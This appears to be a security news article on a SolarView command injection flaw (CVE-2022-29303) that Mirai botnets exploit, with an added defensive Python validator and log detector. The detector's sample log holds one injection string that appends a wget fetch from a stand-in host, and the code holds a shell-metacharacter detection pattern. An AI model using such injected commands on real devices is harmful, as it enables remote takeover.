CyberSecurity SEE

Critical Remote Code Execution (RCE) Vulnerabilities Expose Numerous SolarView Systems


A recent report by cybersecurity researchers at VulnCheck has revealed that hundreds of internet-accessible SolarView systems remain unpatched against a critical command injection vulnerability. Both Mirai botnet operators and less skilled attackers have already started exploiting it, and more are expected to follow.

According to Unit 42 researchers at Palo Alto Networks, the Mirai botnet is taking advantage of a command injection vulnerability (CVE-2022-29303) in Contec’s SolarView Series software. SolarView is used in over 30,000 solar power stations, making it an attractive target for cybercriminals. Of the several vulnerabilities reported in SolarView, CVE-2022-29303 is among the most critical.

CVE-2022-29303 is a command injection vulnerability in SolarView Compact ver.6.00, reachable through conf_mail.php. It carries a CVSS score of 9.8 (critical). The flaw allows an unauthenticated attacker to execute operating system commands on a vulnerable device, which in turn can lead to unauthorized access and full control of it.

Currently, there are over 600 SolarView systems indexed by Shodan, an internet search engine that allows users to find specific types of devices connected to the internet. SolarView is designed to track and display solar power generation and storage for small to medium-scale installations.

VulnCheck Exploit Intelligence has identified public exploits targeting SolarView systems, raising concerns about the potential scope and impact of this vulnerability. In addition to power stations, SolarView has deployment scenarios in buildings and commercial solar power plants.

Internet-accessible Contec SolarView systems are not common, since the product is normally deployed on industrial control system (ICS) networks, but the hosts that are exposed face real risk. The vulnerability is usually described as affecting SolarView Compact ver.6.00, a release dating back to 2019, yet newer versions exist (6.20, 7.00, 8.00 and 8.10), and a version number above 6.00 does not by itself mean the flaw is fixed: the 6.20 and 7.00 releases are still affected.

VulnCheck found that the command injection in conf_mail.php has existed since version 4.00 of SolarView Compact. Only in version 8.00 was validation added for the attacker-controlled $mail_address variable, and conf_mail.php added to the list of pages requiring authentication. Measured against that fix, fewer than one-third of the internet-exposed SolarView systems run a fixed version so far.

Unit 42 was not the first to report exploitation of CVE-2022-29303: an entry for this vulnerability has existed on Exploit-DB since May 2022. Furthermore, SolarView systems are also affected by other unauthenticated Remote Code Execution (RCE) vulnerabilities, such as CVE-2023-23333 and CVE-2022-44354.

Because SolarView systems are monitoring systems, the most likely worst case is a loss of visibility into generation and storage. The impact can be greater, however, depending on how the SolarView hardware is integrated into the surrounding network, since a compromised device gives an attacker a foothold on that network.

Organizations are advised to monitor their public IP space for exposed devices, to track public exploits that target their essential systems, and to update such systems promptly; where updating is not possible, the device should at least be removed from direct internet exposure.
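The two practical points above, the validation of the attacker-controlled $mail_address value that only arrived in version 8.00 and the advice to watch exposed systems for exploitation, can be illustrated in working code. The following is an added example, not code from the original article, from VulnCheck or from Contec: an allow-list validator of the kind a hardened conf_mail.php should apply before the address reaches any command line, and a detector that runs over access-log lines and flags conf_mail.php requests whose mail_address would fail that validation. The log lines are constructed for illustration, in Apache/nginx combined format, and the parameter is placed in the query string so that it is visible in a standard access log; the request shape is an assumption, not captured exploit traffic.

```python
"""Added example, not code from the original article, VulnCheck or Contec.

Shows (1) the allow-list validation a hardened conf_mail.php should apply to
the attacker-controlled mail_address value before it reaches any shell, and
(2) a detector that flags conf_mail.php requests whose mail_address fails
that validation, run over constructed access-log lines.

Assumptions: the log is in Apache/nginx "combined" format, and the parameter
is carried in the query string so it is visible in the log.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}\\]")

# Deliberately strict allow-list for a plain e-mail address; anything else is
# rejected, which closes the whole injection class rather than just ';'.
EMAIL_OK = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Combined-log request line: client ident user [time] "METHOD target HTTP/x" status
REQ_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})'
)


def validate_mail_address(value: str) -> bool:
    """Return True only for a value safe to pass on as an e-mail address."""
    return len(value) <= 254 and EMAIL_OK.fullmatch(value) is not None


def parse_line(line: str):
    """Split one combined-format log line into its request components."""
    m = REQ_LINE.match(line)
    if m is None:
        return None
    ip, method, target, status = m.groups()
    parts = urlsplit(target)
    return {
        "ip": ip,
        "method": method,
        "path": parts.path,
        "status": int(status),
        # parse_qs URL-decodes, so '%3B' becomes ';' before we inspect it
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def find_injection_attempts(log_text: str):
    """Flag conf_mail.php requests whose mail_address is not a clean address.

    Returns (client_ip, decoded_value, reason) tuples: 'shell-meta' means the
    value contains a command-line metacharacter, 'malformed' that it merely
    fails the allow-list.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/conf_mail.php"):
            continue
        for value in rec["params"].get("mail_address", []):
            if SHELL_META.search(value):
                hits.append((rec["ip"], value, "shell-meta"))
            elif not validate_mail_address(value):
                hits.append((rec["ip"], value, "malformed"))
    return hits


# Constructed sample log: an unrelated page view, a legitimate conf_mail.php
# request, and an injection attempt that appends a command after ';'.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jul/2023:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jul/2023:10:12:44 +0000] "GET /conf_mail.php?mail_address=ops%40example.com HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jul/2023:10:13:02 +0000] "GET /conf_mail.php?mail_address=a%40b.com%3Bwget+http%3A%2F%2F198.51.100.9%2Fx HTTP/1.1" 200 1024 "-" "curl/7.88"
"""

if __name__ == "__main__":
    for ip, value, reason in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

Two caveats for anyone adapting this. First, the detector only sees what the log records: if the parameter travels in a POST body, a standard access log will not contain it, and the check has to run in a reverse proxy, WAF or request-body log instead. Second, the fix on the device side is the allow-list, not a metacharacter deny-list; the deny-list here only serves to rank alerts, since an attacker who finds a character the list omits still gets through it, whereas a value that is not a plain e-mail address never reaches the command line at all.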

In conclusion, the critical command injection vulnerability in SolarView systems poses a significant risk to solar power stations and other installations. Its exploitation by Mirai botnet operators and other attackers, more than a year after a public exploit appeared, underlines the importance of strong security measures and of promptly addressing known vulnerabilities.
